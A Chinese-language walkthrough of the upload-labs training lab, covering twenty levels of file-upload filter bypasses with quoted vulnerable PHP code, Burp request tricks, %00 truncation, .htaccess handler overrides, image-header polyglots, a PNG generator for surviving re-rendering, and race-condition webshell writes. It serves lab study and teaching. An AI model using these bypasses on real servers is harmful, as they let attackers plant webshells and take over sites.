upload–labs学习笔记
pass-01
该关卡是通过前端JS校验文件后缀名实现过滤,可以使用burp抓包改名绕过。
将php文件改为.jpg后缀名文件,上传后使用burp修改后缀名。
成功上传,复制图片地址即可执行
pass-02
该关卡是在服务端对文件的MIME进行检查,首先上传图片查看MIME
上传php文件
绕过方式,使用burp抓包后修改content-type
pass-03
该关卡使用黑名单限制了asp,php,aspx,jsp文件的上传
绕过方法:使用不同的php版本后缀名,比如php3,php5,就可以正常上传,不过服务器默认不会解析这种后缀名的文件
过滤代码:
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
pass-04
该关卡是利用Apache中间件解析漏洞,该关卡对文件后缀名做了严格控制,但是没有限制.htaccess文件
.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。是Apache服务器中的一个配置文件,提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。
在该文件中写入:
SetHandler application/x-httpd-php
作用为将符合php语法的文件全部当成php文件解析
我们可以首先上传该文件,再上传.jpg文件
.jpg文件被当成php解析
pass-05
该关卡将htaccess也加入到了黑名单,通过源码:
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
并没有进行大小写控制,我们可以通过大小写混合来进行绕过,上传后
http://172.20.10.4:8080/upload/202104081202253557.pHP
不过linux环境下对大小写控制严格,.pHP文件不会被执行,如果在windows环境下将会被执行
//判断哪些文件后缀名可以上传的方法,可以使用burp进行暴力破解测试
pass-06
在windows环境下,当文件后缀名后出现空格时,系统会自动删除空格,这时我们可以正常使用我们上传的php文件,该关卡在对文件后缀名的过滤中,没有过滤php+空格的情况,我们可以使用burp抓包后添加一个空格进行绕过
不过同样linux环境下,这种文件后缀无法被执行
过滤代码:
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
pass-07
在windows环境下,当文件后缀名后出现 . 时,系统会自动删除 . ,这时我们可以正常使用我们上传的php文件,该关卡在对文件后缀名的过滤中,没有过滤php+ . 的情况,我们可以使用burp抓包后添加一个 . 进行绕过
该情况在linux环境下也不能执行php文件,
pass-08
使用 ::$data 进行绕过,::$data是NTFS文件系统中存储数据流的默认形式,在windows中,访问phpinfo.php::$data,实际上就是访问phpinfo.php
linux环境无效
过滤代码:
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = trim($file_ext); //首尾去空
pass-09
该关卡对文件后缀 . 过滤不严格,我们可以通过 .空格.的形式进行绕过
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
pass-10
该关卡对黑名单中的文件后缀名做置空,但是置空只有一次,我们可以通过双写文件后缀进行绕过
源码:
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
pass-11
该关卡利用php版本5.3.4以下的00截断漏洞,因为提示上传路径可控,我们可以利用burp抓包后修改文件保存路径
原本保存路径为…/upload,手动修改为…/upload/phpinfo.php%00后,上传的图片最终的保存格式为…/upload/phpinfo.php%00phpinfo.jpg,当文件系统读到%00时,会认为文件已经结束,并将phpinfo.jpg的内容写到phpinfo.php中,这时我们就可以正常访问phpinfo.php
漏洞利用条件
1.php版本小于5.3.4
2.php的magic\_quotes\_gpc为OFF状态
pass-12
该关卡与前一关类似,采用00截断漏洞,只是改为POST提交,这时需要将%00进行URL编码,
漏洞利用条件
1.php版本小于5.3.4
2.php的magic\_quotes\_gpc为OFF状态
为何POST型需要进行URL编码:
这是因为 %00 截断在 GET 中被 url 解码之后是空字符。
但是在 POST 中 %00 不会被 url 解码,
所以只能通过 burpsuite 修改 hex 值为 00 (URL decode)进行截断。
pass-13
该关卡提示会对文件头两位字节进行检查,只能上传.jpg .png .gif 三种文件后缀名的图片马
绕过方法一:
使用二进制编辑器,将恶意代码插入到正常图片尾部,
使用工具:010Editor
上传后,利用文件包含漏洞访问该图片
方法二:
修改恶意文件后缀名,加特定文件头
常见图片文件头
JPEG (jpg),文件头:FFD8FF
PNG (png),文件头:89504E47
GIF (gif),文件头:47494638
将phpinfo.php后缀改成.gif ,并且在文件顶部加入GIF89a,这时该文件的文件头变成
上传该文件可也绕过
关键代码:
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
pass-14
该关卡使用getimagesize()函数对图片进行检查,该函数可以获取图片的大小,文件格式
绕过方法:
方法一.
windows下使用cmd copy /b 正常图片.png + muma.php muma.png
生成图片马
phpinfo.php中的内容被写入到图片
方法二
使用一张正常的图片,在图片末尾插入恶意代码
方法三
修改php文件后缀名,在文件首部插入特定文件头
源码:
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
pass-15
该关卡使用exif_imagetype()函数对图片进行检查
exif_imagetype()函数读取图像第一个字节并检查签名,如果发现了恰当的签名则返回一个对应的常量,否则返回 false。返回值和 getimagesize() 返回的数组中的索引 2 的值是一样的,但本函数快得多。
定义有以下常量,并代表了 exif_imagetype() 可能的返回值:
绕过方法与pass-14一致
源码:
function isImage($filename){
//需要开启php_exif模块
$image_type = exif_imagetype($filename);
switch ($image_type) {
case IMAGETYPE_GIF:
return "gif";
break;
case IMAGETYPE_JPEG:
return "jpg";
break;
case IMAGETYPE_PNG:
return "png";
break;
default:
return false;
break;
}
}
pass-16
该关卡提示图片被上传后会被二次渲染,因此当我们上传普通的图片马时,图片末恶意语句会被更改,因此需要做到二次渲染后恶意语句依然存在,才可以绕过此操作
方法一
先上传一张gif图片,图片被二次渲染后,保存到本地,
使用二进制工具比对两张图片,找出没有被更改的字节位置,
然后将恶意代码插入此位置
方法二
使用该代码pass16.php生成能过二次渲染的png图片
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'./1.png');//生成新图片
?>
使用命令 php pass16.php 正常图片,png
pass-17
本关卡利用条件竞争漏洞
条件竞争漏洞(Race condition)官方概念是“发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){//将文件移动到新位置
if(in_array($file_ext,$ext_arr)){//对文件名做校验
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传出错!';
}
}
当我们上传webshell后,没有第一时间做文件后缀名的校验,而是临时存放,移动到新位置后,再做文件名检验。
这时系统代码执行过程会有时间消耗,我们利用这个极短的时间,利用Burp进行发包和范文,就有可能访问到没来得及做文件校验的webshell
//新建php文件1.php
<?php
$f= fopen ("shell.php","w") ;
fputs ($f,'<?php phpinfo();?>');
?>
使用Burp分别抓取上传 1.php 的数据包和访问 /upload/1.php 的数据包。发送到Intruder模块,
在第一个数据包头部添加&a=1,并将1选中
第二个数据包中头部添加?a=1,将1选中
分别设置payload type为Numbers,设置爆破10000次,分别开始爆破,
当第二个数据包的爆破出现状态码为200时,说明攻击成功,这时在浏览器访问/upload/shell.php。
pass-18
该关卡可以利用条件竞争漏洞和Apache解析漏洞进行绕过,不过Apache版本需要低于2.4.x
提示需要代码审计
//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
require_once("./myupload.php");
$imgFileName =time();
$u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
$status_code = $u->upload(UPLOAD_PATH);
switch ($status_code) {
case 1:
$is_upload = true;
$img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
break;
case 2:
$msg = '文件已经被上传,但没有重命名。';
break;
case -1:
$msg = '这个文件不能上传到服务器的临时文件存储目录。';
break;
case -2:
$msg = '上传失败,上传目录不可写。';
break;
case -3:
$msg = '上传失败,无法上传该类型文件。';
break;
case -4:
$msg = '上传失败,上传的文件过大。';
break;
case -5:
$msg = '上传失败,服务器已经存在相同名称文件。';
break;
case -6:
$msg = '文件无法上传,文件不能复制到目标目录。';
break;
default:
$msg = '未知错误!';
break;
}
}
//myupload.php
class MyUpload{
......
......
......
var $cls_arr_ext_accepted = array(
".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
".html", ".xml", ".tiff", ".jpeg", ".png" );
......
......
......
/** upload()
**
** Method to upload the file.
** This is the only method to call outside the class.
** @para String name of directory we upload to
** @returns void
**/
function upload( $dir ){
$ret = $this->isUploadedFile();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->setDir( $dir );
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->checkExtension();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->checkSize();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
// if flag to check if the file exists is set to 1
if( $this->cls_file_exists == 1 ){
$ret = $this->checkFileExists();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
}
// if we are here, we are ready to move the file to destination
$ret = $this->move();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
// check if we need to rename the file
if( $this->cls_rename_file == 1 ){
$ret = $this->renameFile();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
}
// if we are here, everything worked as planned :)
return $this->resultUpload( "SUCCESS" );
}
......
......
......
};
首先使用$_FILES[‘upload_file’][‘name’]接收文件名,然后获取文件后缀名进行白名单检查,需要注意的是这里使用的strrchr函数去截取后缀名的,所以获取到的是最后一个点后面的后缀名。如果后缀名不在白名单内的话就会提示上传失败,否则就会将文件使用rename函数重命名后上传至指定的目录,白名单中包含.7z,我们可以将shell.php改名为shell.php.7z,这样可以绕过白名单的检测,apache2.2.x版本下无法解析.7z后缀的文件,因此使用条件竞争在服务器没来得及对我们上传的shell.php.7z做出处理时,访问shell.php.7z,这时服务器会以php解析shell.php.7z,
和第十七关一样,可以使用burp的intruder模块进行条件竞争。
pass-19
该关卡没有对上传文件对判断,而是对要保存的文件名做黑名单校验,
因此我们需要绕过sava_name的校验,
在文件名后添加非法字符/.绕过
还可以使用00截断进行绕过,不过php版本需要小于5.3.4
代码审计:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上传出错!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
还可以通过绕过黑名单,使用大写PHP进行绕过。
pass-20
代码审计
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
//检查MIME
$allow_type = array('image/jpeg','image/png','image/gif');
if(!in_array($_FILES['upload_file']['type'],$allow_type)){
$msg = "禁止上传该类型文件!";
}else{
//检查文件名
$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
if (!is_array($file)) {
$file = explode('.', strtolower($file));
}
$ext = end($file);
$allow_suffix = array('jpg','png','gif');
if (!in_array($ext, $allow_suffix)) {
$msg = "禁止上传该后缀文件!";
}else{
$file_name = reset($file) . '.' . $file[count($file) - 1];
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$msg = "文件上传成功!";
$is_upload = true;
} else {
$msg = "文件上传失败!";
}
}
}
}else{
$msg = "请选择要上传的文件!";
}
相比较于上一关的源码,此处服务器端先是检查了MIME类型,然后判断save_name参数是否为空,为空就把文件本来名称赋值给$file,否则就是将save_name参数的值赋给它。紧接着判断$file是否是数组。
如果不是数组则将其拆成数组,然后数组最后一个的值(end函数就是取数组最后一个的值)同白名单做比较,符合jpg、png、gif中的一种就允许上传了。
在允许上传之后还要把数组的值拼接在一起对文件进行重命名。所以我们可以构造
save_name[0] phpinfo.php/
save_name[1]置为空
save_name[2]=jpg(一个白名单的合法后缀)。
这样的话,reset($file)取的是数组的第一个元素即phpinfo.php/,然后接了一个’.'符号,之后又将数组最后一个元素内容拼接到一起。
最终的文件名后缀取的是$file[count($file) - 1],
因此我们可以让$file为数组。$file[0]为smi1e.php/,
也就是reset($file),然后再令$file[2]为白名单中的jpg。
此时end($file)等于jpg,$file[count($file) - 1]为空。
而 $file_name = reset($file) . '.' . $file[count($file) - 1];,
也就是smi1e.php/.,
最终move_uploaded_file会忽略掉/.,最终上传smi1e.php。
完结
@ _ _ _ _ _ _ _ _
(c).-.(c) (c).-.(c) (c).-.(c) (c).-.(c)
/ ._. \ / ._. \ / ._. \ / ._. \
__\( Y )/__ __\( Y )/__ __\( Y )/__ __\( Y )/__
(_.-/'-'\-._)(_.-/'-'\-._)(_.-/'-'\-._)(_.-/'-'\-._)
|| Y || || Z || || C || || N ||
_.' `-' '._ _.' `-' '._ _.' `-' '._ _.' `-' '._
(.-./`-'\.-.)(.-./`-'\.-.)(.-./`-'\.-.)(.-./`-'\.-.)
`-' `-' `-' `-' `-' `-' `-' `-'
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
